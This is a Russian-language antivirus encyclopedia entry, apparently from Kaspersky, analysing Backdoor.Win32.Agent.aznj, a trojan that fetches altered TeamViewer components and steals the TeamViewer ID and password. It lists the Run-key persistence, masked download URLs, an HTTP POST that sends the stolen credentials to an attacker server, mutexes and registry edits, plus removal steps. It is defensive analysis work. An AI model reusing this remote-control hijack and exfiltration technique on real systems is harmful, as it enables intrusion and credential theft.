Backdoor.Win32.Agent.aznj

Технические детали
Деструктивная активность
Рекомендации по удалению

Технические детали

Троянская программа, которая без ведома пользователя загружает из сети Интернет другие вредоносные программы и запускает их на выполнение. Программа является динамической библиотекой Windows (PE EXE-файл). Имеет размер 43520 байт. Написана на С++.

Инсталляция

После запуска троянец копирует свой исполняемый файл в каталог хранения файлов текущего пользователя под именем:

%Temp%\msbuild\mscpl.exe

Для автоматического запуска при каждом следующем старте системы троянец добавляет ссылку на свой исполняемый файл в ключ автозапуска системного реестра:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"MsCpl"="%Temp%\msbuild\mscpl.exe"

Деструктивная активность

Для получения удаленного управления над компьютером загружает модифицированные компоненты приложения "TeamViewer" по следующим URL:

http://s***to.net/engine/tv/msbuild.exe

Данный файл имеет размер 5253120 байт.

http://sv***to.net/engine/tv/TV.dll

Данный файл имеет размер 107816 байт. Оригинальная библиотека "TeamViewer".

http://sv***to.net/engine/tv/TV_en.dll

Данный файл имеет размер 9216 байт.

http://sv***to.net/engine/tv/TeamViewer_Resource_en.dll

Данный файл имеет размер 832808 байт. Оригинальная библиотека TeamViewer.

Загруженные файлы сохраняются во временный каталог текущего пользователя Windows под соответствующими именами:

%Temp%\msbuild\msbuild.exe
%Temp%\msbuild\TeamViewer_Resource_en.dll
%Temp%\msbuild\TV.dll
%Temp%\msbuild\TV_en.dll

Далее запускает на выполнение файл "msbuild.exe". Используя библиотеку "TV_en.dll", троянец ищет и скрывает окна с именами класса "TeamViewer", "#32770", "Sponsored session", а также похищает уникальный ID и пароль клиентского приложения TeamViewer. Похищенные данные сохраняются в текстовый файл:

%WorkDir%\msbuild.txt

Затем, в отдельных потоках, выполняет следующие действия:

• Ищет файл:

  %Program Files%\Common Files\wcsheduler.exe
  %Program Data%\wcsheduler.exe
  

• Выполняет поиск окон с именами класса "TeamViewer", "Sponsored session", "ATL:", "Remote Reboot". В данных окнах, из полей ввода, похищает информацию, а именно – ID клиента "TeamViewer", пароль.
• Определяет месторасположение курсора мыши.
• Используя метод POST, отправляет похищенные данные на сервер злоумышленника:

  POST /tv/tvadmin.php HTTP/1.1
  Host: be***op.net
  User-Agent: Opera/9.80 Pesto/2.2.15
  Content-Type: application/x-www-form-urlencoded
  Content-Length: 49
  
  id=<X>&tvac=<ID клиента:пароль>&away=0
  

где X – числа сгенерированные троянцем, например _6_203_-872070089 или _6_203_1886890347. В ответ от сервера получает строку:

normik

После этого троянец сохраняет свой оригинальный файл под именем:

%WorkDir%\err.log

и устанавливает файлу атрибут "Временный" (TEMPORARY).

Рекомендации по удалению

Если ваш компьютер не был защищен антивирусом и оказался заражен данной вредоносной программой, то для её удаления необходимо выполнить следующие действия:

1. При помощи Диспетчера задач завершить троянские процессы "mscpl.exe" и "msbuild.exe".
2. Удалить параметр ключа системного реестра:

   [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
   "MsCpl"="%Temp%\msbuild\mscpl.exe"
   

3. Удалить каталог со всеми файлами:

   %Temp%\msbuild

4. Удалить файлы:

   %WorkDir%\err.log
   %WorkDir%\msbuild.txt
   

5. Произвести полную проверку компьютера Антивирусом Касперского с обновленными антивирусными базами (скачать пробную версию).

Резюме

• Trojan-Dropper. Скрытно устанавливает в систему другие вредоносные программы

• Осуществляет сетевую активность

• Выполняет потенциально-опасные действия

Технические детали

Имеет размер 43520 байт.

Инсталляция

После запуска создает свои копии под следующими именами:

• Каталог для хранения временных файлов ОС Windows (обычно, C:\Documents and Settings\<Имя_текущего_пользователя>\Local Settings\Temp)%Temp%\msbuild\mscpl.exe
• c:\err.log

Создает следующие файлы на зараженном компьютере:

• Каталог для хранения временных файлов ОС Windows (обычно, C:\Documents and Settings\<Имя_текущего_пользователя>\Local Settings\Temp)%Temp%\msbuild\TV.dll
• Каталог для хранения временных файлов ОС Windows (обычно, C:\Documents and Settings\<Имя_текущего_пользователя>\Local Settings\Temp)%Temp%\msbuild\TV_en.dll
• Каталог для хранения временных файлов ОС Windows (обычно, C:\Documents and Settings\<Имя_текущего_пользователя>\Local Settings\Temp)%Temp%\msbuild\TeamViewer_Resource_en.dll
• Каталог для хранения временных файлов ОС Windows (обычно, C:\Documents and Settings\<Имя_текущего_пользователя>\Local Settings\Temp)%Temp%\msbuild\msbuild.txt
• Каталог текущего пользователя (обычно, C:\Documents and Settings\<Имя_текущего_пользователя>)%UserDir%\Application Data\TeamViewer\TeamViewer5_Logfile.log

Обеспечивает Используя системный реестр, системные службы или специальные системные файлы, программа может обеспечивать свой запуск или запуск созданных ею файлов при каждой следующей загрузке ОС Windowsавтозагрузку следующих установленных файлов:

путем прописывания в ключах автозапуска системного реестра:

[ Ветка системного реестра HKEY_CURRENT_USERHKCU\Software\Microsoft\Windows\CurrentVersion\Run ] "MsCpl" = " Каталог для хранения временных файлов ОС Windows (обычно, C:\Documents and Settings\<Имя_текущего_пользователя>\Local Settings\Temp)%Temp%\msbuild\mscpl.exe"

Вредоносная активность

Создает следующие файлы:

• Каталог для хранения временных файлов ОС Windows (обычно, C:\Documents and Settings\<Имя_текущего_пользователя>\Local Settings\Temp)%Temp%\msbuild\msbuild.exe

Следующие файлы запускаются на исполнение:

• Каталог для хранения временных файлов ОС Windows (обычно, C:\Documents and Settings\<Имя_текущего_пользователя>\Local Settings\Temp)%Temp%\msbuild\msbuild.exe

Создает соединение со следующими адресами в Интернете:

• ***.188.101.84:20480
• ***.0.0.1:3623

Обращается к следующим адресам в Интернете:

• http://***ato.net/engine/tv/msbuild.exe
• http://***ato.net/engine/tv/TV.dll
• http://***ato.net/engine/tv/TV_en.dll
• http://***ato.net/engine/tv/TeamViewer_Resource_en.dll

Для определения своего присутствия в системе создает уникальные идентификаторы "mutex"

• Global\TVDLL_StartMutex
• Global\TVDLL_ChangedWindows
• Global\TVDLL_TitleBarWindowsMutex
• Global\TVDLL_ExcludedProcesses
• Global\TVDLL_ChangeRectMutex
• TeamViewer3_Win32_Instance_Mutex
• TeamViewer_Win32_Instance_Mutex
• DynGateInstanceMutex
• {C15730E2-145C-4c5e-B005-3BC753F42475}-once-flagICHJHJAAINFAAAAA

Прочие действия

Ищет следующие окна:

Класс:	Shell_TrayWnd
Класс:	TrayNotifyWnd

Изменяет следующие ключи системного реестра:

[ Ветка системного реестра HKEY_LOCAL_MACHINEHKLM\SOFTWARE\TeamViewer\Version5 ] "ManualStop" = "0x0"

[ Ветка системного реестра HKEY_LOCAL_MACHINEHKLM\SOFTWARE\TeamViewer\Version5 ] "Version" = "5.0.8703"

[ Ветка системного реестра HKEY_LOCAL_MACHINEHKLM\SOFTWARE\TeamViewer\Version5 ] "ClientID" = "0x22C6DEEC"

[ Ветка системного реестра HKEY_LOCAL_MACHINEHKLM\SOFTWARE\TeamViewer\Version5 ] "ClientIC" = "0x1FCAA8AE"

[ Ветка системного реестра HKEY_LOCAL_MACHINEHKLM\SOFTWARE\TeamViewer\Version5 ] "LicenseType" = "0x2710"

[ Ветка системного реестра HKEY_LOCAL_MACHINEHKLM\SOFTWARE\TeamViewer\Version5 ] "GatewayAllowed" = "0x1"

[ Ветка системного реестра HKEY_LOCAL_MACHINEHKLM\SOFTWARE\TeamViewer\Version5 ] "ListenHttp" = "0x1"

[ Ветка системного реестра HKEY_LOCAL_MACHINEHKLM\SOFTWARE\TeamViewer\Version5 ] "useUDP" = "0x1"

[ Ветка системного реестра HKEY_LOCAL_MACHINEHKLM\SOFTWARE\TeamViewer\Version5 ] "Gatewayname" = ""

[ Ветка системного реестра HKEY_LOCAL_MACHINEHKLM\SOFTWARE\TeamViewer\Version5 ] "CustomRouter" = ""

[ Ветка системного реестра HKEY_LOCAL_MACHINEHKLM\SOFTWARE\TeamViewer\Version5 ] "LastRouterPerformance" = ""

[ Ветка системного реестра HKEY_LOCAL_MACHINEHKLM\SOFTWARE\TeamViewer\Version5 ] "LastKeepalivePerformance" = ""

[ Ветка системного реестра HKEY_LOCAL_MACHINEHKLM\SOFTWARE\TeamViewer\Version5 ] "VpnIP" = "0.0.0.0"

[ Ветка системного реестра HKEY_LOCAL_MACHINEHKLM\SOFTWARE\TeamViewer\Version5 ] "IPCListenPort" = "0x270D"

[ Ветка системного реестра HKEY_LOCAL_MACHINEHKLM\SOFTWARE\TeamViewer\Version5 ] "MinimizeToTray" = "0x0"

[ Ветка системного реестра HKEY_LOCAL_MACHINEHKLM\SOFTWARE\TeamViewer\Version5 ] "TotalSessions" = "0x0"

[ Ветка системного реестра HKEY_LOCAL_MACHINEHKLM\SOFTWARE\TeamViewer\Version5 ] "TotalTrafficKilobytes" = "0x3"

[ Ветка системного реестра HKEY_LOCAL_MACHINEHKLM\SOFTWARE\TeamViewer\Version5 ] "CUse" = "0x0"

[ Ветка системного реестра HKEY_LOCAL_MACHINEHKLM\SOFTWARE\TeamViewer\Version5\AccessControl ] "AC_AllowOutgoingConnections" = "0x1"

[ Ветка системного реестра HKEY_LOCAL_MACHINEHKLM\SOFTWARE\TeamViewer\Version5 ] "Security_WinLogin" = "0x0"

[ Ветка системного реестра HKEY_LOCAL_MACHINEHKLM\SOFTWARE\TeamViewer\Version5 ] "UPNP" = "0x0"

и другие...

Удаляет следующие параметры ключей системного реестра:

[ Ветка системного реестра HKEY_LOCAL_MACHINEHKLM\SOFTWARE\TeamViewer\Version5 ] "SecurityDynamicPassword" = ""

Удаляет следующие файлы на зараженном компьютере:

• Каталог для хранения временных файлов ОС Windows (обычно, C:\Documents and Settings\<Имя_текущего_пользователя>\Local Settings\Temp)%Temp%\msbuild\QS.ini